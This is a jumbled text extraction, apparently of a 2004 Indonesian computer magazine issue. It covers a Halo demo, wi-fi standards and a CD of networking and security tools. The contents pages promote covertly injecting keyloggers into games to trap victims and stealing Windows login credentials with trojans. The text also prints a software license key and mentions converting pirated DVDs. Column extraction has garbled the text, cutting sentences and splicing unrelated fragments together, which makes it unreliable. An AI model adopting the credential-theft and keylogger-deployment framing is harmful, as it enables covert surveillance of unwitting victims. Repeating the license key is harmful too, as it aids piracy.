NeoSoft

Pertarungan di Planet Halo, dengan tanah, pantai, dan salju yang mirip dengan bumi. Di Planet Halo ini sisa-sisa armada manusia berpacu dengan the Covenant mengungkap rahasia pusat pengendalian planet kuno ini. ahun 2552. Planet bumi memang masih ada, tetapi kelebihan penduduk memaksa banyak bekas penduduknya untuk membentuk koloni di dunia-dunia lain. Perjalanan yang lebih cepat dari cahaya sudah menjadi kenyataan, dan pemerintahan tunggal bumi melalui United Nations Space Command mendukung sepenuhnya upaya kolonisasi ini; jutaan manusia kini tinggal di planet-planet yang dapat dihuni di tata surya lain.

T

Di Planet Reach sendiri sedang dikembangkan cyborg supersoldier, dan ternyata tentaratentara SPARTAN-II ini dalam uji coba terbukti amat ampuh terhadap the Covenant, namun jumlahnya masih terbatas untuk membalikkan jalannya perang. Kini mereka ditargetkan untuk menyusup ke dalam pesawat the Covenant dan mempelajari dunia the Covenant. Dua hari sebelum misi ini dijalankan, armada the Covenant menyerang Reach dan memusnahkan koloninya. The Covenant kini sudah berada di depan pintu Bumi.

Batu penjuru usaha kolonisasi ini adalah Planet Reach, yang dijadikan pangkalan pesawat antar-tata surya yang membangun pesawatpesawat koloni untuk sipil maupun pesawatpesawat militer UNSC. Karena relatif dekat dengan bumi, Planet Reach juga merupakan penghubung untuk kegiatan sains dan militer di bumi. 32 tahun yang lalu kontak dengan koloni terjauh, Harvest, terputus dan armada yang dikirim ke sana nyaris hancur sama sekali. Hanya beberapa pesawat yang selamat kembali ke Planet Reach membawa berita mengenai adanya kekuatan luar angkasa yang tidak tertahankan menghancurkan armada mereka. Baru pertama kali ini manusia berhadapan dengan kekuatan luar angkasa, the Covenant, suatu gabungan ras-ras luar angkasa yang fanatik. Pendeta tinggi the Covenant menyatakan bahwa manusia adalah musuh bagi Tuhan mereka, dan menyatakan perang suci untuk menghancurkan manusia. Setelah kekalahan berkali-kali, admiral Preston Cole membentuk Cole Protocol, yaitu tidak boleh ada pesawat yang sampai mengarahkan pesawat-pesawat the Covenant ke bumi dan setiap pesawat yang terancam tertangkap harus menghancurkan diri.

Pillar of Autumn

Satu pesawat, Pillar of Autumn, selamat bersama SPARTAN-II terakhir dan melompat tanpa arah ke angkasa luar dengan harapan membawa the Covenant menjauhi Bumi.

Covenant Ship

Tentara-tentara dalam Pillar of Autumn terlibat pertempuran di Planet Halo, tempat terdapatnya The Silent Cartographer pada suatu pulau di planet itu yang suatu ruang peta yang akan membawa ke sistem kontrol Planet Halo.

Pentium III 733, RAM128 32MB 3D accelerator, DirectX 9

HomePage

amkm
anda meminta kami mendownload
tidak dilanjutkan lagi
Keterbatasan tempat pada CD NeoTek membuat program ini tidak efektif dan terlalu banyak yang tertunda untuk dapat dimuat dalam CD NeoTek Jadi layanan ini terpaksa dihentikan dengan bertahap tetap akan memenuhi permintaan yang sudah masuk.

Salam!
Instalasi Sampai Otentikasi

Wireless Security:

• Nocat, suatu captive portal untuk mengendalikan user yang login ke suatu wireless network, dapat ditampilkan dalam berbagai program yang tidak lazim.

LAN atau wi-fi kini sudah bukan barang baru. Selain di airport, kini di berbagai tempat umum mulai tersedia hotspot. Wi-fi mungkin juga digunakan sebagai LAN pribadi untuk sharing akses Internet di dalam rumah atau kantor. Otentikasi pemakai menjadi semakin penting agar tidak seenaknya seseorang ‘nyantol’ bandwidth atau mengintip data-data sensitif maupun rahasia pribadi (termasuk kebiasaan mengunjungi situs esek-esek) anda.

W

Harga NeoTek+CD Pulau Jawa Rp20.000,Luar Jawa Rp22.000,-

Redaksi redaksi@neotek.co.id

Bagaimana menghubungi N EOTEK?
KONTRIBUSI ARTIKEL
redaksi@neotek.co.id

ADMINISTRASI IKLAN
Tel. 021-5481457 Tel. 021-5481457

SURAT PEMBACA WEBMASTER

Fax. 021-5329041

support@neotek.co.id webmaster@neotek.co.id

SIRKULASI NEOTEK ALAMAT REDAKSI
4 Cairnhill Rise #05-01 The Cairnhill Singapore 229740 Telp. +65-67386482 kosasih@indo.net.id

PEMASARAN
#neoteker

pemasaran@neotek.co.id

CHATROOM DI DALNET MILIS PARA NEOTEKER

http://groups.yahoo.com/group/majalahneotek

Vol. IV No. 04 NeoTek

1

Daftar Isi

Daftar Isi
FOKUS VOL. IV NO. 4
Sudah punya Centrino laptop? Atau komputer dengan WLAN card dan Windows XP? Gunakan Windows XP sebagai hacking tool!

NeoTek Vol. IV No. 4
14
Mengenal Tetangga

20
WIRELESS SECURITY

Otentikasi dengan NoCatAuth

Instalasi sampai Otentikasi

Semua user berniat melakukan wireless hacking atau nyantol bandwidth. Pihak penyedia jasa wi-fi harus lebih pintar. Inilah yang dibahas oleh Onno W. Purbo dengan nocat-nya.

NeoStart
6
ABG: Bukan Anak Baru Gede
Standard wi-fi (WLAN) kini didominasi oleh 802.11b dan kini dengan 802.11g yang kompatibel dan lebih aman, sedangkan 802.11a yang lebih cepat dan aman malah kurang populer. Kenali standar-standar wi-fi yang dikenal sebagai standar ABG ini untuk memilih yang paling tepat untuk anda.

Onno W. Purbo membahas instalasi WLAN card yang Oricono compatible. Persyatan dasar untuk dapat melakukan war driving.

9

Persiapan ‘Perang’

NeoReview

13

Instalasi WLAN Card pada Pocket PC

War driving akan lebih nyaman lagi apabila bukan dengan membawabawa laptop, melainkan membawa Pocket PC saja. Persyaratan WLAN card-nya lebih ketat dibandingkan dengan laptop.

Situs NeoTek
Link Langsung
Kunjungi situs-situs yang dibahas di majalah NeoTek dengan sekali klik lewat situs NeoTek.

www.neotek.co.id neotek.kpone.com.sg

45

Konversi Langsung DVD Video Jadi VCD

Jadikan situs NeoTek sebagai pangkalan Anda berselancar

Layanan Rupa-rupa NeoTek
Channel #neoteker di Dalnet Ngobrol ramai-ramai sesama NeoTeker Web Chat Room Kini tidak usah jauh-jauh untuk ngobrol langsung dengan sesama NeoTeker Mailing List Ini yang paling ramai. Segera ikutan berbagi pengalaman berinternet! NeoTeker Official Portal http://www.neoteker.or.id Situs komunikasi antar Neoteker. Neoteker Internet Radio http://dj.neoteker.or.id:8000

Repot ganti-ganti program seperti yang dibahas di NeoTek IV/3 dan perlu satu program saja untuk mengkonversi DVD video menjadi VCD? Sejauh hanya home video dalam format DVD video ataupun DVD-RAM (serta berbagai DVD video bajakan), tidak akan ada masalah mengkonversinya menjadi VCD. Masalah hanya akan muncul justru pada DVD video bermutu tinggi yang menggunakan digital audio yang memberi efek surround seperti Dolby Digital (AC3) atau DTS. Pasalnya 6 channel audio pada Dolby Digital tidak dikenali.

NeoTek versi PDF

Kehabisan NeoTek di kota Anda? Dapatkan saja versi PDF-nya. Gratis!

Download

Tersedia juga download di situs NeoTek selain dari situs aslinya

2

NeoTek Vol. IV No. 04

Daftar Isi

NeoStyle
27
Audio Editing dengan Pinnacle Studio 8
Bagian penting dari video editing adalah audio editing. Untuk itu anda harus mengenali port-port kaluar masuknya audio dari perangkat hi-fi dan komputer yang digunakan untuk video editing. Kabel-kabel dan jack-nya juga tentu.

NeoTekno
32 34
Malware pada Symbian OS
Handphone bisa saja disusupi malware seperti misalnya virus atau trojan. Bagaimana dasar pemikirannya?

NeoSoft
0
HALO
Combat Evolved
Petualangan sci-fi mengusir kekuatan alien yang mengancam bumi

PHP Attack Simulation

NeoProfil
3
Editorial Office
4 Cairnhill Rise #05-01 The Cairnhill Singapore 229740 Telp. +65-67386482

Jangan cuma jadi pemakai hacking tool. Sekali-kali belajar menganalisa kelemahan sistem untuk mendapatkan metode yang efektif untuk mendobrak sistem tersebut.

Business Office

NeoTutor
38
Deployment Keylogger
Mana mau korban dengan suka-rela menjalankan keylogger kita? Maka dalam topik penutup ini dibahas cara menyuntikkan keylogger kedalam game yang menyenangkan sang korban.

Gedung Cahaya Palmerah 503 Jl. Palmerah Utara III No. 9 Jakarta 11480 Telp. 021-5481457 Fax. 021-5329041

Pemimpin Umum
Fachri Said

Pemimpin Redaksi
Kosasih Iskandarsjah

Redaktur Ahli
Onno W. Purbo Michael S. Sunggiardi

30

Konversi CD Audio Menjadi File MP3

41

Artikel ringan mengenai konversi CD audio menjadi file MP3 menggunakan MP3 CD Ripper, sejalan dengan bahasan audio editing pada NeoTek kali ini.

Ngintip Login Windows 2000

Pemimpin Usaha
Fahmi Oemar Dadang Krisdayadi

Windows 2000 (juga NT, XP, dan Server 2003) pada dasarnya tidak terlalu aman juga. Teknik ngintip ala keylogger plus trojan ini ampuh untuk mendapatkan username dan password.

Redaktur Pelaksana
Gianto Widianto

Sekretaris Redaksi
Marni

NeoRagam

NeoTek Vol. IV No. 05 Windows XP Hacking
Setelah dalam edisi IV/4 dibahas cara ngintip username dan password Windows 2000 (dapat juga diterapkan pada Windows XP), akan dibahas lebih lanjut teknik hacking terhadap kelompok OS dari Microsoft yang paling ’aman’ ini.

Webmaster
Supriyanto

4 5

Klak Klik HALO: Combat Evolved Perkiraan Tampilan PC di Tahun 2004 Ngetop dengan Google Bomb Daftar Isi CD NeoTek Digital Video & Audio DriftNET: Multimedia Sniffer pada Linux Mandrake 9.2

Sirkulasi
Hedhi Sabaruddin, Denny

Adm. Langganan
KRISHNAdiSTRIBUTOR

Iklan dan Promosi
Gianto Widianto

Java Remote Control
Kenali Java IO (input/output) serta Java remote control sebagai dasar membuat trojan sendiri menggunakan Java, nantinya.

Keuangan
Aswan Bakri

Langsung dan Menjadi 45 KonversiDVD Video DVD-RAM MPEG-File
Mengenal DVD MovieFactory SE Instalasi DVD MovieFactory SE Konversi DVD Video Menjadi MPEG File Burn File MPEG Menjadi VCD

Bank
Bank BNI a.n. PT NeoTek Maju Mandiri No. rekening 070.001709720.001 Bank BCA Matraman
(khusus untuk langganan)

a.n. Boedi Krishnadi No. rekening 342-239-1611

Vol. IV No. 04 NeoTek

3

NeoRagam

Klak Klik
GAME BULAN INI
HALO
Combat Evolved

TIMBUL TENGGELAM DI TAHUN 2004

Perkiraan Tampilan PC di Tahun 2004
ahun 2003 menjadi titik awal kepunahan disket. Sudah banyak laptop yang tidak lagi menyediakan floppy drive. Yang juga mulai jarang terlihat adalah PS/2 port pada laptop, sejalan dengan semakin populernya periferal yang menggunakan port USB. Apa lagi yang kiranya akan tenggelam di tahun 2004? Dan apa penggantinya untuk fungsi yang sama? Floppy Drive Dengan kapasitas 1,4 Mbyte, floppy drive pada dasarnya sudah kehilangan relevansinya. Kini thumb drive sudah menggantikan floppy drive, dengan kapasitas terkecil 32 Mbyte di pasaran sekarang ini sampai 512 Mbyte. Intel Pentium III Kalau ingin membeli komputer kelas ekonomi di tahun 2004, hindari membeli Pentium III. Pentium IV akan sangat terjangkau. SDRAM untuk Desktop SDRAM sempat merajai RAM untuk desktop PC, mengalahkan RDRAM

134 MB

T

uatu petualangan kepahlawanan berdasarkan science fiction. Bumi terancam kekuatan dari angkasa luar (alien) dan anda bersama sisasisa kekuatan koloni manusia bumi berjuang untuk mencegah kekuatan asing yang dikenal sebagai the Covenant mendekati bumi.

S

Runtuhkan dan ungkap misteri planet kuno, HALO, sebelum para alien itu mendapatkannya. Pada versi demo ini anda dapat memainkan single player campaign maupun multiple player baik lewat LAN maupun melalui Internet dengan para pemain lain di seluruh dunia. Versi multiplayer sampai dengan 16 pemain sebagai manusia yang saling menjatuhkan satu sama lain.
Pentium III 733, RAM128 32MB 3D accelerator, DirectX 9

yang walaupun lebih cepat, harganya relatif mahal. Tapi di tahun 2004 posisi SDRAM akan digantikan oleh DDR-SDRAM. Paralel Port Setelah PS/2 port, pada tahun 2004 giliran paralel port lenyap dari konfigurasi, mengingat semakin populernya USB 2.0 port. Printer masa sekarang pun hanya menyajikan dua pilihan: USB port atau serial port, tidak lagi paralel port. Microsoft Windows 98 Windows 98 tidak akan disupport lagi, dan komputer pribadi akan menggunakan Windows XP Home sebagai standar. Bagi yang masih menggunakan aplikasi DOS, siap-siap saja menggunakan VMWare untuk menginstal Windows 98 ataupun DOS virtual.

Peralatan Elektronik Lain
Pada jaman konvergensi sekarang ini, membahas komputer artinya tidak lepas dari membahas perangkat elektronik lain seperti handphone, kamera digital, video camera, dan kini juga home electronics.

Konvergensi mulai tahun 2004 akan mulai menyentuh perangkat rumah tangga juga. Dimulai dengan home entertainment yang bertemu dengan wi-fi, kelak peralatan rumah tangga lainpun akan kena efek komputerisasi. Layar Handphone Namun yang paling jelas terlihat perubahannya adalah mobile phone. Layar monokrom akan segera ketinggalan jaman digantikan dengan layar handphone 65.000 warna. Ringtone Handphone Masih pada handphone, yang juga akan ketinggalan jaman adalah monophonic ringtone yang akan digantikan dengan polyphonic ringtone dengan 40 macam nada. Kamera Digital Belum lama NeoTek membahas agar pemula paling tidak membeli kamera digital 2,1 Megapixel. Mulai tahu 2004 pilihan untuk pemula sudah 4 Megapixel. Sekarang kamera ‘tidak bermerek’ seperti O’Rite saja sudah 3 Megapixel.

Ngetop dengan Google Bomb

Informasi lebih jauh tentang Google Bombing di http://uber.nu/2001/04/06/

President Bush kini menjadi sasaran bom. Untungnya bukan bom betulan, melainkan Google bomb. Coba ketikan miserable failure pada Google search engine, lalu klik I’m feeling lucky. Anda akan dibawa ke situs web White House yang membahas biografi presiden ini. Google bomb bukanlah barang baru. Bom yang pertama diaktifkan pada tahun 2001 oleh seorang lulusan computer science berumur 23 tahun, Adam Mathes, dari Chicago. Adam menginginkan web site temannya, Andy Press-

man, tampil sebagai situs pertama apabila mengetikkan talentless hack pada Google search engine. Untuk itu ia membujuk para web logger untuk me-link situs-situs mereka ke situs Pressman dengan keyword talentless hack. Sejak itu para Google bomb dimanfaatkan untuk lelucon atau menyebarluaskan pandangan politik. Keyword weapon of mass destruction, Google bomb yang dibuat tanpa sengaja

oleh Anthony Cox, seorang apoteker dari Inggris membawa anda ke spoof error page yang mengejek Amerika dalam hal senjata di Irak. Walaupun spoof site ini hanya lelucon sesama kawan yang tanpa sengaja meledak tak terkendali, tidak urung para pendukung perang terhadap Irak bereaksi keras dengan hate e-mail.

4

NeoTek Vol. IV No. 04

NeoRagam

Digital Video & Audio
Selain bahasan dan berbagai software sehubungan dengan wireless security, CD NeoTek kali ini kembali membawakan beberapa software untuk digital video dan audio Ulead DVD MovieFactory SE Suatu software tunggal untuk mengkonversi DVD video menjadi VCD atau SVCD untuk berbagai format player, computer file, atau televisi PAL ataupun NTSC. Dengan software ini anda tidak usah menggunakan banyak software dalam melakukan konversi. Terutama sangat baik untuk DVD hasil home video (atau DVD bajakan). AC3 Decoder Masalah dalam mengkonversi DVD video terletak pada audionya. Video editing software pada PC hanya mengenal audio mono (satu channel) atau stereo (dua channel), tidak mengenali surround audio 6 channel seperti halnya pada format AC3 Dolby Digital. AC3 Decoder menggabungkan keenam channel itu menjadi dua channel stereo yang dikenali software seperti TMPGEnc ataupun DVD MovieFactory. Power DVD XP 4.0 DVD Player untuk komputer anda yang sudah dilengkapi dengan DVD drive. CD-key: MV96776492627979 ShowShifter 1.55 Suatu multimedia center. Punya banyak sumber video yang terhubung ke komputer seperti TV tuner, DVD/VCD player, ataupun Multimedia File? Gunakan ShowShifter 1.55 untuk mengelola semua itu lewat remote control.

daftar isi cd neotek
AUDIO EDITING
AC3 Decoder Alto MP3 CD Ripper Easy Audio Editor MP3 CD Ripper MP3 CD Writer MP3 DJ Studio ac3decoder.zip altomp3cdripper.exe EasyAudioEditor.exe MP3CDRipper.exe MP3CDWriter.exe iTunesSetup NoCatAuth-0.82.tar.gz NoCatSplash-nightly.tgz opengate090i.tar.gz opensplash-0.2e.tar.gz IP-login-1.2.tar.gz oasis-1.0.tar.gz pam_krb4-5-afs.tar.gz pam_listfile+realm.tar.gz wicap-0.2.tar.gz halo.exe arasan71.exe kfk.zip lead430.exe leadpat1.exe monster.zip santa.exe NetStumblerInstaller_0_3_30.exe MiniStumbler_0_3_23.zip CEnifferARM.zip CEnifferMIPS.zip CEnifferSH3.zip kismet-3.0.1.tar.gz kismet-ipaq-arm-2.8.1.tar.gz kismet-zaurus-arm-2.8.1.tar.gz kismet-zaurus-pcap-arm-2.8.1.tar.gz vxFtp.zip vxFtpSrv.zip vxHpc.zip vxIPConfig.zip vxSniffer.zip vxTftpSrv.zip vxUtil.zip vxWeb.zip Airsnort-0.2.1a.tar.gz WEPCrack-0.0.10.tar.gz apwdemo.exe apwnxdemo.exe epwnxdemo.exe libpcap-0.7.2.tar.gz libpcap-0.8.1.tar.gz WinPcap_2_3.exe WinPcap_3_0.exe dsniff-2.3.tar.gz dsniff-1.8-win32-static.tgz ethereal-base-0.10.0a-1.RH9.i386.rpm ethereal-0.10.0a-i486-3jim.tar.gz ethereal-setup-0.10.0.exe tcpdump-3.7.2.tar.gz tcpdump-3.8.1.tar.gz WinDump.exe WinDump.exe code deploy code phptriadsetup2-11.exe

CAPTIVE PORTAL
NoCatAuth NoCatSplash OpenGate OpenSplash StockholmOpen

WiCap

GAME

Halo Trial Arasan Chess 7.1 Kung Fu Kim Lead Soldier Monster Frenzy Santa Claus in Trouble

WAR DRIVER

NetStumbler Windows Mini Stumbler Pocket PC CENiffer ARM CENiffer MIPS CENiffer SH3 Kismet 3.0.1 Kismet iPAQ ARM Kismet Zaurus ARM Kismet Zaurus ARM Pcap vx FTPClient vx FTP Server vxHpc vx IP Config vx Sniffer vx TFTP Server vx Utilities vx Web Server

POCKET PC/PALM WIRELESS HACKING

WINDOWS XP HACKING
NTFS DOS NTFS for Windows 98

ntfs30r.zip vtfs98ro.exe Setup.exe Setup.exe Setup.exe shwshift.exe driftnet-0.1.6-1mdk.i586.rpm driftnet-0.1.6.tar.gz EtherPEG.cpt etherpeg-for-x-1.3a1.sit

VIDEO EDITOR/PLAYER
DVD MovieFactory SE Power DVD XP 4.0 Picture Explorer 7.0 Lite ShowShifter 1.55 DriftNET Mandrake 9.2 DriftNET Linux EtherPEG Mac 9.0 EtherPEG Mac OS X

MULTIMEDIA SNIFFER

WEP CRACKER
AirSnort WEPCrack

WIRELESS SNIFFER
AiroPeek AiroPeek NX EtherPeek NX 2.0

LIBPCAP/WINPCAP BASED SNIFFER
LibPcap 0.7.2 LibPcap 0.81 WinPcap 2.3 WinPcap 3.0 Dsnniff Linux Dsniff Windows Ethereal Red Hat 9 Ethereal Slackware 9.1 Ethereal Windows TcpDump 3.7.1 TcpDump 3.8.1 WinDump 3.6.2 WinDump 3.8

PROYEK
DriftNET adalah suatu multimedia sniffer, yaitu mengendus aktivitas browsing lewat suatu ethernet card dan menyimpan bukti-bukti browsing berupa gambar, video, dan audio. Instalasinya melalui file RPM pada Linux Mandrake 9.2 sangat mudah.

Deployment Keylogger Ngintip Windows 2000 PHP Attack Simulator

Vol. IV No. 04 NeoTek

5

NeoStart

ABG: Bukan Anak Baru Gede
Wireless LAN mengalami perkembangan yang sangat pesat akhir-akhir ini. Dengan diluncurkannya perangkat yang menggunakan protokol 802.11g, maka harga perangkat 82.11b harganya turun drastis. Saatnya untuk mulai ikut wireless club.
Onno W. Purbo tentang wireless LAN (WLAN) atau wi-fi (wireless fidelity) di NeoTek II/6 Maret 2002, wi-fi masih merupakan ‘barang baru’ dan tidak banyak tanggapan dari pembaca. Maklum waktu itu wi-fi masih menjadi bahan perbincangan para pemilik warnet dan bukan pemakai langsung. Lebih dari setahun sesudahnya, NeoTek III/8 (Mei/Juni 2003) membahas wireless hacking, dan tanggapan yang masuk malah ada yang negatif, yaitu mempertanyakan mengapa mengajarkan ‘yang bukan-bukan’ ke masyarakat Indonesia yang baru saja melek Internet. Kini dengan sudah semakin banyaknya ISP yang menawarkan wireless access, serta sudah semakin banyaknya tempattempat umum yang menyediakan akses wireless (dikenal dengan hot spot), maka sekali lagi NeoTek membahas wireless LAN atau wi-fi. Kali ini, selain mengulang dasardasar wi-fi, hacking dan security pada wi-fi, juga akan dibahas wi-fi pada Pocket PC.

WI R E LE SS S E C U R IT Y

S

EWAKTU NEOTEK PERTAMA KALI MENYAJIKAN ARTIKEL

tuk Mengakses Internet) sampai dengan 54 Mbps yang yang dapat diperoleh dengan wi-fi dengan protokol 802.11a dan sekarang 802.11g. Masing-masing teknologi ini mempunyai pasar sendiri-sendiri serta membawa hardware maupun protokolnya sendiri-sendiri pula. Standar 802.11 mendefinisikan protokol-protokol yang mengatur lalu-lintas wireless berbasis ethernet. Standar ini mempunyai beberapa substandar yang bersaing satu sama lain di pasar. Kita akan membahas substandar utama, yaitu 802.11 yang kini tersedia dalam 802.11a, 802.11b, dan 802.11g.

Local Area Network
Jauh sebelum wireless network populer seperti sekarang ini, Institute of Electrical and Electronics Engineers (IEEE) telah menyusun suatu sistem untuk mensertifikasi teknologi-teknologi yang akan muncul. Sertifikasi IEEE memastikan bahwa suatu produk yang menggunakan suatu teknologi akan kompatibel dengan produk lain yang menggunakan teknologi yang sama. Salah satu teknologi yang melewati proses penelaahan dan L sertifikasi IEEE adalah Local Area Network (LAN). Suatu LAN pada dasarnya adalah sekumpulan komputer yang saling terhubung satu sama lain, yang hardware dan software pendukungnya memungkinkan komunikasi di antara komputer-komputer itu. Untuk menangani sektor teknologi ini, IEEE menetapkan 802 group.

Local Area Network dan Grup Standar 802
Dengan berkembang pesatnya teknologi wireless, maka terdapat banyak jenis produk dan protokol yang tersedia. Teknologi wireless yang paling awal misalnya adalah telepon seluler generasi pertama yang kemampuan transfer datanya hanya 9600 baud (lihat NeoTek III/12, Ponsel un-

Perangkat Wireless 802.11b

1

WIRELESS NIC CARD
Bila hanya untuk mengakses wireless LAN (wi-fi), yang diperlukan hanyalah wireless NIC card, yang bentuknya dapat bermacammacam: PCMCIA card (untuk laptop), USB adapter (laptop atau desktop), PCI card (untuk desktop), ataupun CF card/SD card (untuk Pocket PC/Palm).

2

ACCESS POINT
Access point (AP) membentuk infrastruktur wi-fi. Access Point dapat dihubungkan ke Internet lewat modem dan komputer-komputer lain dengan wireless NIC akan terhubung ke Internet lewat AP ini yang bertindak sebagai gateway.

3

WIRELESS ROUTER
Kini tersedia pula wireless router yang selain mempunyai fungsi sebagai access point juga DHCP server (wired maupun wireless) yang menetapkan IP address bagi semua komputer lain yang terhubung secara wireless (maupun wired) padanya.

6

NeoTek Vol. IV No. 04

NeoStart
Sertifikasi 802 mencakup banyak subset, yang masing-masing mewakili bidang yang berbeda-beda dari networking. Sebagai contoh, 802.3 adalah standar yang mendefinisikan bagaimana Ethernet bekerja. Suatu produk agar dapat disebut suatu produk Ethernet harus memenuhi semua persyaratan yang dispesifikasikan dalam 802.3. Selanjutnya wireless Ethernet diklasifikasikan dan dikendalikan oleh 802.11. 802.11 selanjutnya dipecah lebih jauh ke sertifikasi yang lebih rinci lagi, seperti 802.11a, 802.11b, dan 802.11g. Masing-masing mendefiniskan metode yang berbeda dalam menyediakan wireless Ethernet. transmisi, yang walaupun data yang dikirimkan kecil saja, tetapi dari berbagai device kumulasinya akan membebani network. Lagi pula bukan cuma 802.11 yang menggunakan CA, melainkan juga AppleTalk (pada Mac). 802.11 adalah suatu seri standar yang mendefinisikan metode-metode wireless untuk mentransmisikan lalu-lintas Ethernet. Teknologi ini diuji dan dipasarkan oleh WECA (Wireless Ethernet Compatibility Alliance) dan secara umum dikenal sebagai Wi-Fi atau Wireless LAN. Substandar 802.11a, 802.11b, dan 802.11g berbeda dalam physical layer-nya dan masing-masing mempunyai keunggulan maupun keterbatasannya sendiri-sendiri.

CSMA/CD
Salah satu standar yang populer dalam grup 802 adalah standar 802.3, yaitu untuk sertifikasi perangkat-perangkat yang Ethernet-ready. Sebagai contoh, suatu perangkat Ethernet haruslah mendukung teknologi yang dikenal sebagai Carrier Sense Multiple Access/Collision Detection C (CDSMA/CD). CS pada carrier sense, pada dasarnya berarti hanya satu orang (atau perangkat) yang boleh bicara pada suatu waktu. Selanjutnya, multiple access, adalah cara teknis untuk mengatakan bahwa ada lebih dari satu orang yang ikut bicara. Namun, bila suatu perangkat berbicara pada satu perangkat tertentu saja, maka informasi yang disampaikan tidak relevan untuk yang lain dan bisa diabaikan oleh yang lain. Collision detection artinya setiap Ethernet dapat mengetahui kapan dua perangkat mulai berbicara pada saat yang bersamaan. Apabila hal ini terjadi, perangkat akan berhenti dan secara acak memilih waktu tunggu untuk kemudian bicara lagi, dan yang memilih waktu tunggu yang lebih pendek yang akan berbicara lebih dulu.

Wireless LAN Non-Standar dan ISM
Sebelum ratifikasi standar 802.11 oleh IEEE sudah berkembang beberapa teknologi wireless berdasarkan berbagai jenis spectrum hopping untuk memfasilitasi transfer data. Teknologi-teknologi ini bersifat proprietary dan lebih lambat dibandingkan standar; umumnya pada kecepatan 1 sampai 2 Mbps dan jangkauan frekuensi 900MHz sampai 2.4GHz. Semua standar 802.11x menggunakan frekuensi ISM (Industrial, Science, and Medical) sebagai yang didefinisikan oleh FCC. Frekuensi-frekuensi ini, 900MHz, 2.4GHz, dan 5GHz, semuanya merupakan jangkauan frekuensi bebas yang boleh digunakan oleh siapa saja untuk keperluan testing ataupun produk komersial. Setelah standar 802.11x diratifikasi pada tahun 1997, terdapat tiga jenis teknologi frekuensi yang menjadi metode utama untuk transmisi data: DSSS, FHSS, dan IrDA. Dari ketiga ini, dua yang pertama yang digunakan dalam teknologi WLAN.

CSMA/CA
802.11 menggunakan alternatif dari CSMA/CD, yaitu CSMA/CA (Carrier Sense Multiple Access/Collision C Avoidance). Hal ini dilakukan dengan cara mem-broadcast pesan intention to talk. Pada komunikasi tipe ini, setiap perangkat harus mengirimkan data sebelum memulai

802.11b, DSSS pada 2.4GHz
Standar ini yang paling banyak ditemui pada berbagai perangkat wireless. Suatu perangkat 802.11b beroperasi dengan mengirimkan sinyal wireless menggunakan Direct Sequence Spread Spectrum (DSSS) dalam jangkauan frekuensi 2.4GHz.

Integrated Wi-Fi

4

CENTRINO LAPTOP
Semua laptop Centrino pasti menggunakan Intel Pentium M processor, Intel chipset 855GM, dan Integrated Intel PRO Wireless 2100 (802.11b) atau 2100A (802.11a/b) seperti misalnya Acer TravelMate 290 series ini.

5

POCKET PC ATAU PALM
Pocket PC atau Palm handheld kelas atas hampir dipastikan menyediakan fasilitas wi-fi 802.11b, selain juga akses wireless Bluetooth, seperti halnya iPAQ 5450 dan Palm Tungsten C ini.

6

PC SEBAGAI ACCESS POINT
Intel menjadwalkan pada pertengahan 2004 akan melunculkan Grantsdale chipset yang memungkinkan sebuah PC menjadi wireless access point, khususnya ditujukan untuk Intel Prescott processor. Chipset ini juga mendukung PCI Express yang akan menyaingi AGP graphics port.

Vol. IV No. 04 NeoTek

7

NeoStart
Implementasi 802.11b yang sekarang mendukung produk WLAN yang lebih lama dengan laju 1-2Mbps, dengan syarat perangkat-perangkat ini menggunakan DSSS pada jangkauan 2.4GHz. Standar yang sekarang meningkatkan lagi kecepatan sampai 11Mbps.

Frekuensi 2.4GHz
Jangkauan frekuensi 2.4GHz merupakan frekuensi terbuka tempat banyak jenis perangkat beroperasi di dalamnya. FCC membuka jangkauan frekuensi ini agar para pemasok mengembangkan perangkat-perangkat wireless tanpa harus meminta persetujuan dari FCC. Karena banyaknya perangkat yang menggunakan frekuensi ini, tidak heran apabila banyak terjadi interferensi. Misalnya pada wireless phone kita dapat mendengar pembicaraan orang lain. Ini karena yang bersangkutan berada pada frekuensi yang sama dengan anda. Hal yang serupa dapat terjadi pada perangkat WLAN. Walaupun interferensi tidak sampai merusak sinyal, namun dapat mempengaruhi sinyal 11Mbps menjadi hanya 1Mbps saja.

Laptop dengan Orinoco wi-fi NIC card, paling tepat untuk melakukan kegiatan war driving.

DSSS

DSSS (Direct-Sequence Spread Spectrum) mencegah interferensi dengan cara menyebar frekuensi ke beberapa frekuensi pada saat yang bersamaan. Dengan kata lain, DSSS mengambil suatu bit data, memecahnya menjadi beberapa potongan, dan mengirim potongan-potongan ini pada saat bersamaan dengan me-multipleks-nya ke beberapa frekuensi. Selanjutnya bit berikutnya dipilih dan dipotong-potong lagi. Cara ini membantu memperluas bandwidth, serta memungkinkan banyak perangkat beroperasi pada satu WLAN yang sama. Sejauh waktu dan frekuensi tidak bertabrakan, datanya tetap utuh.

Sebetulnys 802.11a mempunyai kelebihan, yaitu memberikan kecepatan 54Mbps, lima kali dari 802.11b yang 11 Mbps. 802.11a beroperasi pada frekuensi yang berbeda (5GHz) dan menggunakan metode transmisi yang berbeda yaitu OFDM (Orthogonal Frequency Division Multiplexing). Frekuensi 5GHz belum terlalu dipenuhi oleh segala macam peralatan seperti 2.4GHz dan juga sinyal 5GHz memungkinkan data transfer yang lebih cepat. 1 GHz artinya satu juta cycle per detik, jadi 5 GHz dibanding 2,4GHz kira-kira akan dua kali lebih cepat. Lebih lanjut lagi, 802.11a menggunakan OFDM yang memecah frekuensi 5GHz dan membaginya menjadi beberapa frekuensi yang saling topang tindih. Dengan kata lain OFDM dapat melewatkan lebih banyak lagi data. Walaupun lebih unggul dibandingkan 802.11b, kelemahan 802.11a adalah biaya, kompatibilitas, dan kekuatan sinyal. Karena 802.11b sudah meluas penggunaannya, kebanyakan pemakai tidak merasa perlu meng-upgrade ke 802.11a. Kelebihan 802.11a dirasakan tidak sebanding dengan biaya yang harus dikeluarkan, lagi pula perangkat 802.11a tidak kompatibel dengan perangkat 802.11b. Belum lagi jangkauan sinyal 802.11a lebih pendek dibandingkan 802.11b sehingga sinyal 802.11a kurang stabil dibandingkan 802.11b.

802.11g, OFDM pada 2.4GHz
